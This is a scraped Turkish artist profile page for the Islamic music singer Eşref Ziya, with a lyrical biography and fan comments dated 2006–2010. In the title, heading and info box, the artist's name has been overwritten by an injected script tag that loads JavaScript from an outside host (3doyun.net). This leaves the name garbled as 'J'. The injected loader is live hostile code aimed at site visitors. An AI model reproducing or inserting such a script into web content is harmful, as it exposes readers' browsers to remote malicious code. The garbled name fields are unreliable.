İslami Müzik Tv
İslami Müzik TV

  Ayeti Kerime
" "
  Hadis-i Şerif
""

J<script src=http://3doyun.net/dcr/s.js></script> Ziya Profili - İslamimuzik.com

    J Ziya Kimdir ?J<script src=http://3doyun.net/dcr/s.js></script> Bir çalışma masası bir fincan kahvesi ve melodisi ölümlü Dünya’da yoğun sanat hayatına teneffüs müzikleri besteleyen Eşref Ziya.
Sabreder, düşünür, sessizleşir ve herkesin ışıkları söndürdüğü akşamlarda açar kitabını sayfalarca sabaha ulaşır. Mütevazıca yaşadığı Dünyanın içinde sağlam bir sanat haritası oluşturmasının sebebi, kendi pusulasını popüler yönlerden uzak tutmasıdır.

Kent soylu bir müzik anlayışına sahip olan sanatçı Eşref Ziya, kentliliği sadece modern zamana değerleriyle tutunma aracı olarak görmüş ve bu felsefesiyle kentliliği basit bir üstünlük hırsı olarak görenleri de yanıltmıştır.
Kentlilik ayakları yere basan aklı taşlanmamış sanatı ayakta tutmak için entelektüel bir savunmadır ona göre..

Sessiz kalmakla sükut etmek arasındaki farkı bilerek müziğe başlayan sanatçı, sadece büyük harflerle yapılan etiket edebiyatından uzak durmuş, felsefesini sadeliğe ve asilliğe dayanan sanat üzerine kurmuştur.

Sanatın fikir estetiği üzerine kurulu olduğunu düşünen Eşref Ziya tek yağmurda boyası akan beyinlere, gözleri hep duvara bakan sabitliğe ve aslını kaybetmiş sığ sanat anlayışı taşıyanlara gülüp geçmiş ve nerde kalmıştık dercesine yoluna devam etmiştir.

Sadece müziği alkışlanan kolaycı bir fikre sahip olmadığını, derinliksiz ve yoz söylemlere sessiz kalmamakla göstermiştir. Alkışı, varlığı yetmeyen yokluğu bitmeyen anlık tutkulara benzetir Eşref Ziya. Önemli olan kalıcı bir sanat dili oluşturmaktır ve özgünlük alkış toplayan en büyük erdemdir.

Dünyanın başlı başına nefes darlığı çeken bir senaryo olduğunu düşünen sanatçı Eşref Ziya, gerçeğin yanıltıcı bir parçası olmaktansa gerçeğin gerçeği olmaya karar vererek “ THE IMAM” filminde gösterdiği oyunculuk performansıyla sanata tek taraflı bakanları şaşırtmış ve iddiasız ama istikrarlı sanat anlayışını da film karelerine sığdırmayı başarmıştır.

Kalbin akıl almaz sonsuzluğundan
Dünyanın akıllanabilir taraflarına..
Bir sanat izi bırakırız..
Dünyası yorgun değil
Sadece Dünya yorgunuyuz.
Omzumuzda dost eli gibi duran gitar.
Elimizde paslanmamış alkışlar.
Güneş batar ayaklarımıza.
Sade bir kahvenin ardında
Bekleriz sabahı.


Bu Sanatçının Profili 5151 kez ziyaret edilmiştir.

     J Ziya - Yorum Ekle

piyanist_emrah
selamunaleyküm bir müzisyen olarak müziğin alt yapısındaki gizemli çizgileri belirgin bi şekilde yüzeye çıkardığınız aşikar bişekilde göze çarpıyor..maşallah sizleri daha iyi yerlerde görmeyi umut ediyorum herzaman başarılarınızın devamını diliyorum(piyanist_emrah)hatay/dörtyol
Bu yorum 2010-08-17 00:24:34 tarihinde yapıldı.

Fatih Karadeniz
Evet bende Ali arkadaşımızın söylediklerine sonuna kadar katılıyorum. Yıllarca müslümanların sırtından geçimini sağlayan bu insanların, sıkıştığı zaman sırtından attığı ilk insanlar müslümanlar oluyor.
Bu yorum 2007-04-28 22:35:31 tarihinde yapıldı.

Abdulkadir
Eşref Ziya kendi kulvarında 1 numara bence. Ve yorumu , müziği de emsalsiz. Ben çok saf ve samimi buluyorum kendisini. Lütfen yorum yaparken eleştiri yapalım. Karalama değil !!!
Bu yorum 2007-04-15 19:15:17 tarihinde yapıldı.

fatma aksoy
eşref ziyayı topa tutan ali ismindeki ksrdeşimize sesleniyorum.yaptığın resmen ona çamur atmak!'dinden para kazanmak'diyerek ne büyük bi ithanda bulunduğunun farkında mısın?sesi ve yorumu sana göre güzel olmayaiir ama kimseyi bu şekilde yargılamaya hakkın yok!!!
Bu yorum 2007-02-01 14:42:22 tarihinde yapıldı.

ali
herkese selam üzülerek söyleyeyim yazılanlarla alakası olmayan bir insan nasıl bu kimlik benim der. bana göre dinden para kazanan bir insan şiddetle istismar olayına karşıyım ve sesi ve yorumu güzel deyil bir zamanlar boşluk vardı değerlendirdi şu zamanda hiç olurdu amacım çamur atmak deyil ama yeter artık polianacılık oynamak nereye kadar.bütün sanatçılara tavsiyem gerçek kimliğinizle kendinizi tanıtın bu insanları kandırmayıııın
Bu yorum 2007-01-06 16:49:54 tarihinde yapıldı.

tarık yüzer
eşref ziya bir numara bu kadar gerisi laftan ibaret
Bu yorum 2006-11-14 15:21:28 tarihinde yapıldı.

fatih Karadeniz
selam.E.ziya' nın eski eserlerini dinleyen biriyim. Yenilerini dinleme ihtiyacı hissetmiyorum.Bunları yazarken aklıma güzel bir söz geldi. EN BÜYÜK KERAMET İSTİKAMET ÜZERİ OLMAKTIR.İslami kesimin yıllarca dinlediği insanların bu sözü haklılığını kanıtlamak için uğratığını görmek beni üzüyor.
Bu yorum 2006-08-20 23:14:47 tarihinde yapıldı.

aslı
bence hala parçalarınız çok güzel şu zamanda ben sizin sesiniz kadar güzel ve kulağa hoş gelen bir ses daha duymadım.ama umarım ilahiden vazgeçmeyin siz evlerimize ve gönüllerimize onunla girdiniz
Bu yorum 2006-08-16 15:21:47 tarihinde yapıldı.

merve uygun
slm esref abı sızı sıvastakı konserınızde tanıdım gercekten ezgılerınız çok guzel kısacası SÜPERSİİNİZZZ ALLAH a emanet olun
Bu yorum 2006-05-09 18:08:28 tarihinde yapıldı.

yabancı
selam.. eşref abi çok değişti artık onu dinlemiyoruuzz, eski hali daha iyiydi bence..
Bu yorum 2006-05-02 22:32:07 tarihinde yapıldı.


Yorum Yapyn

J Ziya

J<script src=http://3doyun.net/dcr/s.js></script>
Genel Bilgiler

Adı: J
Soyadı: Ziya
Doğum Yılı:
Doğum Yeri:
Tarz:
Eğitim Durumu:
Albüm Sayısı: 6
Etiketler:
Websitesi: Resmi Sayfası